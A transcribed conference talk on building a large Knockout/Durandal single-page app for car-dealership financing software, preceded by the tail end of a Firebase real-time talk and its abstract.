much work for it, actually. So, you know, hope it shows kind of how some of the barriers with working with different languages has been lowered with using these types of platforms because even though I showed the samples in JavaScript, then anybody could have pushed data to the database using whichever BI they felt like. So it also enables collaboration in that sense. Of course, I hope you learned a bit about Firebase and how real-time has become really easy and got some sense of working with Angular and AmberJS. And I would be extremely happy if someone actually went home with a good business case. So they would be using this for more than just last. And that's it for me unless you have any questions. Yeah? Does Firebase has any very capabilities like queries or something? Or something like that? Just fetching data by the URL? No. That is pretty much the focus of the database. So as I shortly demonstrated, then you can limit your queries and in that sense, do things. But it is in no way meant to be a data store as such. It is meant for it to be a way of allowing you to handle changes to data. And that is why in most cases I would still have my regular data store and then have this on the side for doing these things because it still allows me to not have to deal with all the complexities of building a real-time application, wiring that up to a bag and handling all the edge cases and so on. What's the update of the, I mean, the underlying technology sending the update to the browser? Is it polling or is it how is the? Oh, yeah. It uses WebSockets and kind of in the same way as SignalR, it tries to use WebSockets and if there aren't WebSockets in your browser, then it has fallbacks doing long polling and, yeah, same things as you would see in SignalR. Good point that I did mention that. I haven't been pushing the limits of it to be honest. But, yeah, from what I've seen, it scales pretty well and there are some pretty big companies using this already. But I won't try and guess on any explicit limits. I wouldn't know. If you really have an extreme case, then, yeah, I think you should just try it out. And that's the awesome thing, you know, you can try pushing data this and it'll just take you 15 minutes, half an hour and then you see if it's actually sufficient because, you know, at the end of the day, talking about performance is always complex because there's a lot of aspects. So, yeah, in the end, I would just give it a go and see if it tumbles over. Yeah? Yeah. Yeah. The question was if you could have your own instance installed of Firebase Navid running in your own data center and you can, kind of what they initially offer is that, you know, that you sign up for it and that is this bag and that's a service deal. But you can contact them and they do have an option where you can actually, you know, buy into installing it in your own center and they will help you do that. But I think that is pretty much a per case thing so they will talk to you about what it should cost in your specific case. They don't just have a package out of the box for it. But they have people doing that. Yeah? Yeah. Yeah. Yeah. Yeah. But it's not bound to the DOM in that sense. But it would, as you work with people in any sense and you manipulate stuff, of course, you'll be able to do the same things. If things change, then they are propagated. I think that's it. Thank you guys for coming and remember that if you want to stick her, then I have a bunch up here.
The cloud is more than just AWS vs Azure, scalability and big data. In this talk we will take a look at how BaaS offerings like Firebase can make it a walk in the park to build realtime collaborative applications. We will cover the building blocks for doing this, as well as how it fits in nicely with frameworks like Angular and Ember. We will also talk about why this is valuable and hopefully leave you with enough knowledge to be inspired about possible usecases in your own business.
10.5446/50589 (DOI)
We're good? Excellent. Let me hit play here. Good afternoon. This is real-world spa, a knockout case study. This session really shouldn't have the word knockout anymore in it, because we're going to talk about a lot of things outside of knockout. So if you're coming in here expecting an introduction to knockout, that's not my focus here. What we're going to do is talk about a lot of lessons learned from the biggest single-page application that I've ever built. This is about eight months to a year worth of work that we launched just a few months ago. A lot of the lessons learned will hopefully be useful for you too. I'm using what we're talking about here is really the foundation for my next course, just thinking about patterns, practices, and principles for single-page app development. My clicker will work better if I plug it in. Let's try that. All right. So I want to get to know you and make sure that I'm delivering what's most useful for everybody. How many people in here have already built a single-page app? Okay. So we got about half the room of built a single-page app. How many people have done significant work in JavaScript to build web applications? So quite a few more hands there. That's the vast majority of the room. Cool. How many know Ember right now? Very few. Okay. Gil got it covered. How about Angular? A lot of hands there. Backbone? Okay. Just a few. How about knockout? Okay. So good. You weren't coming in here wanting an introduction anyway. You've already familiar with knockout. Great. Anyone worked with Durandal? Just a few hands. Okay. Required JS? Okay. Probably few enough. We may talk a little bit about that too. Anybody ever heard of Ajax before? You don't even bother raising your hands. Yes. Okay. Good deal. So here's the things that we can focus on and we're going to get through as much of this as we can. There is a sea of decisions in making a single-page application and that's maybe the hardest part is making those decisions. I spent weeks and weeks and lots of reading and ultimately even made maybe the wrong decision. We'll get to that in a minute. I want to demo the application that we built and I want to show you the code so you can tell me that it's rubbish and why and that'll be just fine. But we'll all get better along the way. I want to discuss the tech stack that we picked and the performance implications of that stack and if you're interested I can also show you the stack and how it runs in older browsers like IE8 because it's interesting comparing that to Chrome. You can literally feel the difference of an older browser. It still works but it does not feel as snappy. And then I want to close with two things. I want to close with talking about principles for writing single-page apps. A lot of lessons learned from building something this big. And then finally talking about whether building a spa even makes sense because there are places where it does and doesn't. So let's dive in. I want to talk first about the sea of decisions because this is maybe the hardest part about it. Now I love jQuery and how many people in here coded in jQuery? A whole lot of handy. There we go. Hello, Room. Great. jQuery is really useful and has helped move us forward in a lot of ways. Thank you, John Rezeg, for making that happen. Now the problem with jQuery is it really is only solving a piece of the puzzle. Manipulating the DOM is really useful. Making Ajax calls easier is useful but there's a lot more that we need to get done for single-page apps and that's what these sorts of options try to solve for you. In this course or in this session today we're going to talk about knockout and derandal, the one at the top here. But these are your other logical options and these days more and more we're seeing anglers sneaking closer and closer to becoming just the de facto standard here. It's ridiculous how much power that it has here recently in inertia along the way. Ultimately these are all great options but I'll get into maybe some specific reasons that I feel like anglers getting so much traction in this. But the app that we're going to look at is built with these technologies at the top. Of course you have to pick a language which is strange. You'd think by default it's JavaScript but if you're somebody that's into C sharp or VB.net then maybe TypeScript sounds interesting. Or if you're a Ruby developer then you probably like CoffeeScript. Or if you're someone I've never met then you probably like Dart. Is anyone using Dart? It's silence. Yeah, I don't know. Google, this is something that Google tried that just doesn't seem to be catching on. You have to choose how you're going to return all that JSON to your application. We went with just good old web API. It's nice and simple. So we're writing C sharp on the server and just returning JSON over web API. Node.js is another popular way to do this and I could list on and on here. But this was another decision we had to make. We had to pick a promise library because if you're using knockout and derandal that doesn't come out of the box. We could have used jQuery. I don't recommend using jQuery because jQuery does not honor the promises spec. And because of that there's some weirdness in there. You're really better off choosing one of these other three. We went with Q and have been quite happy with it. If you want to do testing you're going to need a framework for that too. And GIL did a talk about Jasmine. Just anybody go to GIL's talk on Jasmine? So quite a few hands. Okay, I figured that would be the case. So I happened to choose Q unit. I've been pretty happy with it. From all that I've read though, Jasmine is probably a better choice. Q unit, the advantages. The learning curve is really low. It was actually created by John Rezeg to test jQuery. Hence the name Q unit. But it's really easy to pick up and it's a good start. You'll probably want some kind of a utility library to make JavaScript feel a little bit more like a big grown up server side language. And that's what these seek to do. You can, if you're familiar with C sharp, you can do things that feel a bit like link statements within the realm of these utility libraries. Hi, Steve. I just saw you over there and now I'm all excited. Sorry, I got Steve wrote a knockout. Am I right? Started the project. Okay, yeah. So smart guy over there. I've just got to say hi. He made a lot of this possible. Data access. We've got another decision to make. Amplify, breeze. These are two ways to do it. I didn't end up getting this sold to my manager because if I were to describe breeze to you right now, I would say breeze is a way to basically expose your database over a RESTful API. Boy, that sounds convenient and it doesn't sound very secure, does it? So I can't really figure out by the time you've done the work to secure all the edge cases that would happen from effectively just making a RESTful API call to your database. I don't understand. Anybody in here worked with breeze? Is my description accurate? No opinions. Okay, we'll move on. Network transport. Another decision that you have to make. We're using plain old Ajax calls because ultimately there's very little that we need to do that is truly real time. We didn't need server side push than anything that I'm doing. But if you're going that route, then of course you can just Ajax long polling is a really simple way to go or just making call every so often. Basically down here at the bottom of the screen, these are options that abstract away all of this confusion. If you choose to use signal R, then signal R is ultimately using one of these things up here for you and you don't know that it's doing it. You just trust it and it works, which is pretty cool. So a lot of ways that you don't have to deal with that complexity. Of course you need to persist your data somewhere. We didn't do anything flashy. We went with SQL server and we have a pretty complex data model. We're doing a lot of joins. We're using caching so that it's not a big deal to pull all this back and spit it out in this right shape for our JSON. So that's been working out well. Then of course you need to do cross browser testing. I'm going to look at browser stack and show you guys how we're doing cross browser testing with it. Browser stack is really cool and it saved us a lot of time from dealing with virtual machines. If you aren't familiar with it, this modern IE, this link here, which I guess you'll have to download the slides to see the link. Modern IE is a Microsoft initiative that has old versions of IE, virtual machines that you can download and they'll work in a number of different VM platforms. All right, so that's the introduction. Let's get a little bit geekier and talk about an app demo. Here was the situation. I work in automotive software and we had a Silverlight application that car salesmen were using and it was getting a little long in the tooth for a number of reasons. For one thing, people are now wanting to be out at car dealerships with tablets, with iPhones and be able to do their work and Silverlight is a non-starter on those platforms. Now I don't know much about the automotive industry around here. Do you still have dealerships that hold inventory of cars? Is that an idea here? Okay, because I know that's not worldwide. The reason I ask that too is the big idea of our application is this. So here's Vinny, my friend, the car salesman. He's a nice guy, questionable taste in clothes, but otherwise, nice guy. Vinny, you sit down at his desk and you're going to talk about buying a car. Maybe you found this Ford Focus and it's just really exciting. When you sit down at his desk, that is called desking. That's salesman jargon and what you're doing there is talking about the bottom line. How much are you going to pay for that car? What payments will you make? What's your interest rate? What bank will you go through? How can I upsell you on a bunch of different options? Car salesman need a piece of software to make this happen. That piece of software is called desking and that's what I'm going to show you. We built a single-page application to help make Vinny be more successful. So I'm going to jump over here to the app itself and make sure I'm logged in. I'll jump back in here. One thing that you do see is the rest of this application is not a single-page app. What I'm showing you here is one of the few places in the entire application that is a spa. You're also going to notice that because of our Wi-Fi, it's going to be pretty painfully slow to load. I'll get into also some reasons why. This app has almost 100 JavaScript files, separate files that contain the logic to perform what's going on on the screen. It has about 95 different HTML files. Has a huge portion of CSS to make it all happen too. So let's do this. Imagine you're coming in and you're going to buy a new car and I'm going to name this deal. Maybe I'm trying to sell you a Ford Focus. I'll just name it that. That's fine. And you're considering purchasing it new. So that's the template. I'm not even going to add a vehicle, but I could go in and search inventory if I wanted to. So I'll go ahead and just create the deal. And you're going to see this all pop up. Now we designed this to fit on 1024-Wide. You can see it just squeezes in at the current res here. So now we're seeing a deal and you can see I'm trying to decide between doing a purchase, that's the P, and a lease here. So let's say for instance that I'm trying to decide on a down payment. Well, I tell you what, I'm going to add a car in. Well I'll do this instead. I'm going to pull up a previous deal so that you don't have to wait for me to do all this stuff. Just show you how it is all together. All right. So this person is thinking about buying a 2006 Mercury Milan right here. And there's the picture of it. We can see it has 65,000 miles and it's selling for $9,900. And they're considering a cash deal in this case, but most people these days end up purchasing a car and making payments on it. And they're considering maybe a $1,000 down payment or a $2,000 down payment or $3,000 down payment. Notice how as I'm typing these things in, it's making Ajax calls to the server and you're seeing payments calculate immediately. Maybe I can get him a 4.5% interest rate at 60 months. Now I'm going to tab out. And again, you just see little toast pop up on the right hand side of the screen that's showing things that have changed. And now we have down payments of $1,000, $2,000, or $3,000. And these are the monthly payments that someone would make based on that. Now imagine you're sitting there and we're having a conversation and you go, I can't afford $173 a month. And I go, OK, well that's fine. What can you afford? Let me click this roll button here. Well I could afford $125 a month. That I can do. So I'll go ahead and click roll. And what it's doing is making calculations and figuring out what numbers could I change to get you to that down payment because we want to pay $125 a month. Well I could lower the selling price. I could increase my down payment. I could get more for my trade in. Or I could pay for 88 months instead of for 60 months. Well, like most Americans, I just want to pay longer. So that's what I'm going to do. We're fine with going into debt, into perpetuity here. So I clicked that and now what happened was, note my payment right here. Now it's $124. So it changed the payment accordingly. It came down here and set the monthly term just like we'd like. Now I could go into a whole lot more that this thing does and I could open up all sorts of dialogues and open other things, lots of jargon, but I don't want to bore you with the application. I want to show you this enough so that you can understand some of the things that we ran up against. The first takeaway that you have here is when I change one value here, if I change this to 5.9%, pay attention to the math on the left hand side of the screen in this gray box here. I'm going to tab out and you'll notice that the balance due will change. Well I'm sorry, no, that's not a good example. I'm going to change this, change my purchase price, $12,000. Now when I do, all this math down here changes. All the payments over here change. So at any given time, there are 10, 20, 30 different DOM elements that have to change when one thing changes. So this is when I had the epiphany that the old school model of using jQuery to manipulate DOM elements really falls apart. Because if you're using jQuery to say, okay, when that cell changes, change this cell, this cell, this cell, this cell, this cell, I can't do it, it falls apart. Imagine maintaining that thing because when I change that cell, these 14 things change. When I change this cell in a different way, these 22 other things change. So what you need to be able to declare is say, I want this value right here bound to a certain piece of data back in the JavaScript. And that's exactly what's going on here. If I scroll this down some, you can see that I'm using knockout. And it's just a data bind formatted text to payment. In this case, it's called matrix payment because this is called a payment matrix over here. So this data dash bind is just saying, go get the JavaScript variable called matrix payment and put it in here. And formatted text is a custom binding that I wrote that formats the text the way that we would like it for this application. I can go in and do other things like copy this scenario over. I could create a new deal and maybe put that in for a different car or for the same car. I could go in and edit the vehicle. I can search for deals. All sorts of things going on. And again, I don't really want to focus too much on the app, but I want to show you enough that we can use it for a bit of conversation later. Does anybody want to look at code? Okay. Well, good. I was hoping I'd get a yes there. Otherwise, I was going to have a hole in my schedule. Yeah. All right. So let's talk about code. This is the folder structure. Is that big enough that you guys can see it on the TVs over there? Cool. This is the folder structure for it. I have left out the rest of the big huge app. This is just the single page app that we've built. The way I have this structured is we have custom bindings in a folder. Keep our CSS there. Our images is all self-explanatory. These are all the JavaScript libraries that we're using. As you can see, jQuery, we're using Kendo for a little bit of our UI. Of course, Knockout. We're using a few different Knockout plugins, and in particular, Knockout Mapping, which has been really helpful. I'll get to that. Of course, Q. And then Toaster. Toaster is a project by John Papa that is doing those little nice green confirmations that pop up in the corner and then fade out. That's a handy little add-in. That said, I could have used Durandal for that too, but I liked how Toaster did it. And then our services. You could think about the services section as really this is where all our Ajax calls sit. They're in one folder called services. So anytime I'm going to make a call to the server so that I can ultimately hit the database, make changes, get back to JSON, it's going to happen through JavaScript within this folder. You could see that we've broken it down. I say that, but there's a few things in here that aren't dealing directly with any kind of Ajax call type work. Like cookies is just a service that I wrote that abstracts away the browser cookies and gives us a little cleaner API to work with. And then local storage, the same thing. It's a little service that lets me work with local storage in a way that's useful for us and then a little math library, those sorts of things. So down here is the real meat and potatoes, the views and the view models. Oh, and I skipped over tests, this single file has our test. These are Q unit tests. I'll get into Q unit if we have time. I don't know if we will, but all of our tests currently just sit in this one file. So let's look at views and view models. Who here is familiar with MVC? Probably a lot of hands. Okay, so in MVC we have, especially in ASP.NET MVC, there's this idea of convention over configuration and we're saying by convention I have this view called user.html and then we have this corresponding view model sitting over here and those two get bound together because they have the same name. They sit in the same corresponding directory structure. That's the way Durandal works. It's the same thing. Durandal gives you conventions on top of knockout, which is pretty cool. That's both the benefit and the downside of knockout. The beauty of knockout is that it is just a library that solves a really particular problem and as someone who spent a lot of time in Unix, I get it. The power of Unix is being able to pipe all these commands together and I'll pipe this cat this file and pipe this to said, pipe that to awk and then grep for such and such and you get all this power by taking little tiny pieces, little tiny applications and using them together. That's what knockout allowed us to do because knockout solved the problem of binding and it does that really well. The thing that it doesn't do though is tell you where to structure your files and how to do so. That's what Durandal does for us. Let's jump into the heart of the application. I'm going to collapse this down. This is default.aspx. This is what loads initially. The first thing that's interesting about this is that this file is only 46 lines long. There's not much here to consume. I have, at the top, we'll just run through it. I have some references to CSS, not much to see here. Then we come down to the body and there's this. This piece is of interest. This is the wrapper that gets changed. You know how when I first loaded it, it said loading and you waited for it to load and then it went away? This is what Durandal replaces after it's pulled down all of your content. It ends up slapping all your content into the loading wrapper. It basically looks for an element with an ID loading wrapper that's sitting within application host which sits right up above. If you do Angular, Angular has a similar idea but you would say ngapp to be able to reference the app and then things within that get handled by Angular. Then we jump down to the bottom and you'll see all the scripts. You can see there's quite a few. Just probably nothing too surprising here. We have a tracker. We're using track.js which, by the way, if you're wanting to track JavaScript errors, track.js is a great service. A friend of mine, Todd, runs it. He's speaking here too. He's already spoken though so you missed it if hopefully you got to see him. Then ultimately down here at the bottom we have what? Knockout, queue and some simple libraries for handling dates and whatnot. The interesting thing is you're going, wait, that can't be all the JavaScript because I said there were 90-something files with a JavaScript that ultimately get used here and that's true. The real story is what's going on here on 44. We're using Require.js and a lot of people weren't familiar with it so let me go into that. The story with Require.js is you can download your JavaScript files on demand and you follow what's called the asynchronous module definition pattern which basically lets you say at the top of your file the other dependencies that your file has. A lot like a using statement. In C-sharp you'll say using this, using this, that's you saying, hey, go get these other resources and pull those in for me. Let's look at one example of a view model. Let me try to pick, okay, this one's massive. Let me pick one that's a little easier to digest. Okay, yeah, this one's pretty easy. This is the view model that is used for handling templates. If I jump over here to the UI so you know what templates are, it's over here in this accordion under Manage Templates. You can open up different templates and manage them. These are just quick ways to get started on a desk and people can set up a desk in different ways. This little area right here has its own view model. Ultimately, this has a view model, this has a view model, this has a view model, this has a view model. The big app and all the complexity, every single dialog box has its own view model. We've eaten the elephant a bite at a time. Back to RequireJS. This is an asynchronous module definition pattern. What RequireJS is saying is right here, I'm saying, okay, here are three. Three dependencies. These are three other files that this file needs to load. What RequireJS would do is when I made a call to this file, it would say, okay, go get these other dependencies and bring them into scope. I define what variables are used for these over here on the right. You'll notice, and if I formatted this better, you could read it better. This corresponds to this, the second, to the second, and the third to the third. I'm saying this is the variable name that you will use down below to reference those. The cool thing about RequireJS is on page load, I'm not having to pull in those 95 files. I pull in the JavaScript files that are necessary, and then as they're needed, RequireJS goes out and it makes the calls to get the others. That keeps your initial HTTP call as lightweight as possible. Let's go back to default. The way that all works is by convention, it takes a HTML5 data attribute called main, and then that forces it to come out here and look for a JavaScript file called main. In here, that's where I configure RequireJS. This is some stuff specific to Durandal, so I won't bore you with those details. The largest view model in this application is desk.js, probably not surprising. This is where the core of the logic sits. If you look at the number of dependencies on this one, it's high enough to be a little bit embarrassing for me. These are, as you can see, there are a lot of dialogue boxes in this application. We put all of those under slash windows. Then, of course, these are all the variable names that associate those things up above. The one thing I am proud of is this file is huge, but if I scroll down through it, what you see is there's a lot of, let me just do this. I'll collapse it all down. If I collapse down to just function names, you at least see that these are a lot of small, well-named methods because watch the line numbers on the left. This is something I do a lot when I open any kind of file. I like to collapse it down to definitions and then scroll through and just get a feel of the high level of what it does because you can read the function names and you can look at line numbers and go, I shouldn't see any huge jumps in line numbers. If I see a jump from line 1,000 to line 2,000, that's a bad sign because that means there's a thousand line method sitting there and there's a lot going on that I need to go understand and there's no good function name that's going to declare all that's going on inside. All right, so how big is this? These are the stats. It's a very heavy load. 93 JavaScript files, 19 separate HTML files, five CSS files and 11 images because we're using sprites, a spritesheet that really greatly reduces the number of images that we have to require for this. So that's 132 HTTP requests. That's pretty absurd. Is this malpractice? Is that too many? I feel like that's just silly. So for those that think it's silly, what is your recommendation to me to reduce this number? Bundling and minification, yes, and that's the very common answer. Now I am not bundling or minifying in this case and can anyone think of a reason why I shouldn't bother? Yes? Did you call me lazy? Because I'm lazy loading? That sounds much better. Thank you. We're going to go with the second hand. Yes, because I'm lazy loading and that is part of it. With RequireJS, if I bundle everything, RequireJS can't do its thing anymore and request them on demand. So that's one reason. Now the bigger reason is this. Remember, this whole app sits behind a login. The situation is a salesman comes in in the morning, grabs their coffee and they load this application and this will be the only application that they use all day. So whether this takes one second or three seconds, and by the way that's about the difference between these two in our case, doesn't matter because it's a couple seconds once a day. It's really small beans. So there's some other things that are really a downside to bundling and minification. Once you go to production, then all of a sudden your code in production doesn't mirror what you have on your local machine. There's ways to get around that, but it does add complexity. And I am all for keeping it simple if I can. And in our case, we can keep it simple and live with the fact that it doesn't exactly load like blue blazes. That said, this, let me, let's just see how fast it loads. 132 HTTP requests on conference Wi-Fi, hitting servers and, oh, we're done. So I wasn't done doing the description. We're hitting servers in the United States from the other side of the world. I can tell you this, when I demo it in the States, it is quite a bit faster. This, also, I think the Wi-Fi just seems a little slow today. So let's do it one, two, three, four, five. Yeah, that's pretty painful. This is a Republic app. I'd give it an F. But given our user base, this works okay. Now if I cleared cache and did this again, you'd see that number go way up. Because if I open up Fiddler, of course, and look at what's going on here and see all the requests come down, let's do that. So here it is spitting through them all. One by one. Got them all in. And, well, no. It's still working on it. In fact, it looks like we're getting... Oh, no, I guess it did all come down. Okay. Just a lot of things didn't have to get loaded because it was all cached. Okay. So let's jump back over here. The full single-page application, 53 view models, nine libraries, 39 pop-up windows, 56 HTML files, and 94 RESTful endpoints. There are a lot of service calls. And also, I should get into the REST side of things here. And let's see. I'll do that a little bit later. I want to save that some. One of the reasons that we had to choose a knockout with the Randall was because the great thing about knockout is you can use it all the way back to IE6. And for now, I haven't heard any changes on that front. I think that's staying for the foreseeable future at the moment. There's this real trend right now toward evergreen browsers. And this idea that we're only going to support browsers that auto-update. Now, the definition of auto-updating is a bit interesting, though, because IE10 auto-updates. But as far as I know, IE10 will not auto-update to 11. Is that true? Can anybody confirm that? I have not heard any confirmation that IE10 will ever move to 11. So IE10 is not an evergreen browser. And I don't know of any plans for IE11 to auto-rev to 12. Maybe that will be the first one that's truly evergreen. But that's what we need is this idea of people that are on the browser today will get the new version as soon as possible. That helps us really move this story of single-page applications forward. And that's important because IE8 is 10 times slower than modern browsers. And you can feel this. Does anybody want to see how this runs in IE8? Okay, I figured some people would be curious. This is a good time for me to show you BrowserStack. We're using BrowserStack to do cross-browser testing. Beauty of BrowserStack is you pay them a little bit of money, and then all of a sudden you have huge convenience. Let me show you what you get here. These are all the operating systems that I can test in. And even some mobile emulators. This for Windows XP, just Windows XP. Look at all the browsers I have to choose from. I can go all the way back to IE6. And then, of course, I get to select my resolution. Now I tend to spend most of my time testing in IE8 on Windows XP because sadly, 14% of our customers are still on IE8. 14% of them are still on 7, but I was at least able to sell management. The 14% on 7 cannot use this new app. I just did not want to go down that road of trying to support 7, too. There's a lot more pain going back to IE7. So this is firing up a virtual machine. And oh, I just remembered, I can't do that this way. Wait, wait, where did I go to? I think I pointed to the wrong... Give me just one second. I'm going to load back up. I think what I did was I pointed to... Yes, I did. I'm going to the wrong URL. That makes all the difference I found. It's getting the right URL for demos. There's a pro tip next time you speak. All right, so we're going to hit the proper prod URL here. And it does rely on Flash. It's a little bit slow because remember, it's spinning up a virtual machine just for you. And now... And so here's the mind bender is I'm hitting some machine somewhere in the world and the browser is showing all this to me basically using Flash. And it is very slow, especially on slow Wi-Fi like this. It's pretty painful to use. You really want a fast network to be able to use BrowserStack. And it feels especially slow when you're trying to demo for people. But you can automate tests with BrowserStack. So you want to write a bunch of tests and then integrate and make sure that your app runs properly in older browsers. Then you can write automated tests and just ship them all off and they'll run up. And you don't have to worry about exactly how long they take because it's all just automated and you're not standing around waiting. All right, so you're going to have to bear with me on the fact that... Let me try full screening here to get us a little more space. And it is loading right now. It's going to be... There we go. Okay, so we are in. By the way, there's a bug in their virtual machine. I should have pulled up the IE7 version instead, but this is a display issue that only happens in their virtual machine. It doesn't happen on real native items. And boy, does this look as awful to you as it does to me? Yeah, I think they're... And that's the thing. They will throttle down display quality as much as they have to based on your connection to get you something viewable. They can see that the Wi-Fi here is painfully slow. So let's do this. How long does it take to load a desk within this app? I will click this and one, two... So you can see... I'm going to tell you when I click. Click. Now in Chrome, it was instant. One, two... It was about two and a half seconds. Let's go over to Chrome and see how fast this is. One... One... Yes. One... I mean, so you can see Chrome is more or less instant. Even on slow connection as I load these. But over here on this VM, it's pretty painful. One, two... And a given, this is the combination of a slow VM and also running IE8, which has a much slower JavaScript rendering engine. Let's do something that ends up exercising the engine a bit more. This changes a whole bunch of DOM elements. So I'm going to say I want to roll to 225 and I'll end up setting the price here. So this is going to change all sorts of elements behind the scenes. And we'll go one, two... About two, two and a quarter seconds. So if you were using this all day, you'd probably go, oh, this is a little painful. So I'm hoping that the people that use it on IE8 complain about the speed and then I can say, well, hey, you have a free solution. Just go upgrade your browser, you know, or go download Chrome for free. Even if you have to have IE8, you could always have Chrome alongside it. There's nothing we can do about the fact that it is 10 times slower. So things that are instant in Chrome show up here. And this is, by the way, after doing a lot of work to improve the performance. But there's just a lot of bindings going on here. There's a lot of people know what computed observables are, knock out those, help you basically run computations on certain fields so that you can imagine that some of these are derived from calculations from other fields. And that is one interesting question. So you guys are seeing all this math happening, right? Where do you think I'm doing the math? Client or server? How many people think client? How many people? So how many server? A lot more hands than I assume. Okay, so the room thinks I'm doing it on the server and the room's right. At first I wanted to do it on the client because the client would avoid making an Ajax call to go calculate all this stuff. There's some problems with that because the math here is not trivial, not trivial at all. There's a lot of business logic involved. There's taxes for every single state in America and that all differs even based on localities, different cities. So we need to make calls to the server to run all of that calculation. So there's also some pretty complicated really algebra and advanced math to be able to pull off things like rolling a deal and figuring out how changing one number impacts all these other numbers. There's a ripple effect that happens there. So the server made sense there. We make a call to the server, it calculates it, it sends it back. I want to show you how big this data model is. I say recent deal, so I'm going to go over here to Fiddler and remove everything. Now I'm going to just load this one deal for Robert Taylor. We just loaded it. Let's go see what Robert Taylor's deal looks like. Here it is. Here's our service call. I'm going to pull it over and we'll look at the JSON that came back. I'll go over here to JSON. So one thing for starters, the size of the JSON was 4k, little over 4k worth of JSON. Which I just went to Douglas Crockford's talk. He said when he designed JSON, he was imagining people would send 2 or 3k with it and he's had bugs open for people trying to process gigabytes worth of JSON. And he had an integer overflow from somebody trying to do so, which is really interesting. Page cases, we keep using this. So what I want to do is just scroll down to give you an idea of how complex the data model is because I don't have time to take you through the whole app. But I'm going to scroll slowly so that you can see all the properties that are getting sent down to make this application happen. There's accessories, there's add-ons for the cars, there's service payments, there's different flex payments, monthly taxes, gap. I'm trying to scroll slow, but there's a lot there. Hundreds and hundreds and hundreds of properties. Old school jQuery, imagine if I was going in and I said, all right, let me go through this. First element, I will tie to this DOM element. The second property to this DOM element. Does that work? With that much JSON, could I do it? And would I go insane before I got to the end of it? It just doesn't work, right? And that's the beauty of using knockout combined with the mapping plugin. Because what the mapping plugin does is, so people said they were familiar with knockout. In knockout, you need to declare something observable so that knockout will keep track of that value. And you will get a two-way binding. I don't want to take all of these properties and have to say one by one, set a variable within JavaScript and set it observable to this property. Because I would be repeating myself, right? And with the mapping plugin, I don't have to repeat myself. Let me show you how this works. So for instance, within, here we go. So I take all the deals and I bind them using ko.mapping from JS. And that's saying, go take all this JavaScript that you just received and make everything in it observable. And now anything within that view model is observable by knockout. And anything that changes in the JavaScript will change the corresponding HTML element, DOM element. And anytime the DOM element changes, the JavaScript value corresponding will change. And this is a good segue for that. I think I've got it in there now. I'll bounce back for a second to that. I wanted to show you this quickly. I forgot to wrap up the performance. So this is how it depends on performance. You can see that with an empty cache, I was back in the states getting about a 13-second load time on IE8 initial. That's painful. That's pretty hard to justify. But they only have to pay it once the first time they load it. Then it's all cached up. And you can see that with a warm cache, three seconds really isn't too bad. So this is where you just have to decide whether minifying the JavaScript and unifying the files would be worth it. This is the tech stack that we've been looking at. And when you look at all these boxes, it's pretty intimidating. Now the server side is pretty simple. We're using Web API or Mlight for data access layer and then MS test for automated unit testing. But how many people feel like that client side story, these nine boxes on the right, is too much? That's too complicated. And that's a common feeling. And my concern is this, that if I am an employer out there looking for a developer, it's really hard to find somebody that knows all of this. And it's hard to convey it. If I tell people that I could look for somebody that knows knockout, but the chance of finding somebody that knows knockout and Durandal, it gets lower. And then somebody that knows knockout and Durandal and understands required JS and understands these other conventions that we're using, it starts to become a much smaller and smaller pot. And this is part of the reason that I think Angular is becoming a lot more popular because Angular tells a story that is far, far simpler. We'll get to that in a minute. Now it's, I say it's simpler, but it's simpler because it is extremely opinionated. And if you don't like it, tough luck, right? It is a very, very different view of the world. We use knockout and Durandal because 14% of our customers are on IEA. And here's the three big reasons that Durandal is really useful. It is convention-based. So just like ASP.NET MVC, your models and your views, it defines where they go. You can set up routing. This all feels really familiar if you've ever worked in that space. It allows you to compose things together. And this is really cool. So see how I'm saying div, data buying, compose. This goes out and it gets the view model called vehicle. And then it just splats it right into the page, right within this div. So whatever is within that view model, it goes get to the view, the corresponding view model, glues them together, and then puts them there on the page. Really easy to understand. So if you're familiar with ASP.NET web forms, for instance, then you could think of this like a reference to a user control. It's just a user control sitting right here. It's a little reusable piece that you can plug in. And I already mentioned routing. But Durandal and I have had a bit of a torrid love affair of recent. This was hard for me because remember, I said we were replacing Silverlight with this new HTML5 JavaScript CSS app, right? And I made the call and said we should use knockout with Durandal. And we launched just a couple months ago and then the bomb drops. Here we go. In case you haven't, how many already heard that Durandal is basically dead? Rob isn't using those words, but more or less, Rob, who started the Durandal project, has moved over to join the Angular team. He did a Kickstarter and the Kickstarter just didn't quite play out for Durandal. So I think he decided it made the most sense if you can't beat him, join him. And he has some really cool ideas that I'm hoping come over into Angular. Because as somebody that's worked in both Durandal and Angular, there are some things that Durandal does that I really like that isn't yet in Angular. And I think we'll start to see some of those. This is an interesting read, though. Nonetheless, so there's the tombstone, sad moment. And this is the way I felt when I read it. It was a punch in the face. Having to tell my boss that we might as well be on Silverlight or on Dead Tech again. Now that said, this is very, very different because someone may pick up Durandal and keep rolling with it. And even if they don't, moving from Durandal over to Angular isn't near as painful as moving from Silverlight to where we are now. Almost everything that we have can be reused. Most of the HTML won't have to change drastically. We'll start typing in G a whole lot more if we move to Angular sometime here soon, which is likely going to happen. So again, then this is our stack and a whole lot of boxes here. And this is why I believe Angular is getting a lot of attention. It is easier to grok this than this. And ultimately, you're going to need a lot of these other things up here if you want to build a full application. And this is a lot the same situation that you could argue that this is sort of Windows and this is, you could argue that this is Unix and this is Windows. People like Windows because it's opinion it just says, hey, do all these things. Whereas Unix is cool because it's a whole lot of small things and I'll pick the best of breed of everything. If you want the best of breed, you can still play in this space. Now Durandal's MIA, but the fact is everything that Durandal does, you could go ahead and do yourself. Durandal's just a set of conventions for working with knockout. Knockout isn't going anywhere. So you just have to make those decisions on your own instead. I've already talked about required JS, so I don't think I'll do a deep dive on any of that. We do have automated tests, but I don't know that I'll have time to get into it too. Ultimately the way we're doing testing is really automated integration testing. And the cool thing about having the separation of concerns is that I can test the view models and I can trust that when the view model is in a certain state, the right things are happening. I'm not testing whether a certain DOM element exists by doing something like you might do with Selenium, for instance. I'm not testing the UI. I don't have to fire up IE or use PhantomJS or anything like that. It's just I'm testing logic by testing the view model and saying, if the data is in this state, then the right things have happened. So it's not as fast as unit tests and it's a little more brittle than that, but it is pretty quick to get set up. And what this does is you just fire it up in your browser or you can use, has anybody used Chetzpa? A few hands. Okay. You can use Chetzpa, which will integrate, and I'm sorry, I'm speaking to Visual Studio, anybody that works in Visual Studio could use Chetzpa to integrate QUnit with Visual Studio and then your tests will run in the test runner and they'll feel totally native even though it's a JavaScript. I'm not going to read you this slide, but if you download the slides, this is just a reference for everybody. So I want to close with some principles. These are some lessons learned from the last year of this work. First question, how do I keep the DOM and the JavaScript in sync? Who can answer that? Binding. There we go. 